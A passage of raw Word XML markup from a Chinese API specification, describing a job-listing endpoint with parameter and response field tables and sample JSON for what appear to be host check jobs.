    <w:p w14:paraId="699AB53A"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list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F275CD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 必传，因全局作业与用户作业分属不同库，不传无法分页处理。另外全局作业暂不</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>支持分</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>页查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54219E16"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90"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C21689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8BAA71B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BA98CFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52922850" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="042E40E4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38B564E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21ECF725" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AD1F845" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="353EE75D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D7C2BCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA8D0BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A5C6296" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F4AD7C6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="493EB094" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0508F6C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F02867" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业类型：1：全局作业 2：用户作业，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3ECA4E93" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2544B766" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="583C9041" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26770367" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>每页数量：默认为50，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D43C772" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7235342B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E1F3C7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F60BD1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>当前页，从0开始，默认为0，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C4725F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5087A455"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list</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobType":2,"page":0,"size":30}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB82E9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE11FCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5c3d7c7a7d761b6b1c9048fd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ceshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "全部主机",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastExecuteTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1547797225,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1547533434,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D71CF"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753"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5893"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3ED6F3A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253DB8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="561AA9C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57EF42C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10E1BB31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2A48CD0B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="574F52D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="192A133F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E310524" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="399F2B31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C490152" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45EEFB75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C3196E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15766513" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A103EE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="001A5C55" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C4A0FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D613A4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26061934" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53019E15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6062AB03" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E54CE0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6671596E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2580CC93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5934F9DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46525C5A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44478B79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07BE84B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32F524B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018E2C9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71E0A20C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60ADAFF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0243FEFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0599A6C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="729FA743" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35B83576" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51B5ACDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41B52932" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DFA429F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64DAB755" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业下检测项数量（极少数情况下自定义作业可能包含已删除的无效检测项，真实数量以接口4.5.14为准 ）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4BEEFA80" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E7B3D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31EA9C31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1076C511" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3772D8AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C006928" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A0CED4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CF84C8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C9DDC85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F21BA99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1945C7DD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46CEFAD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
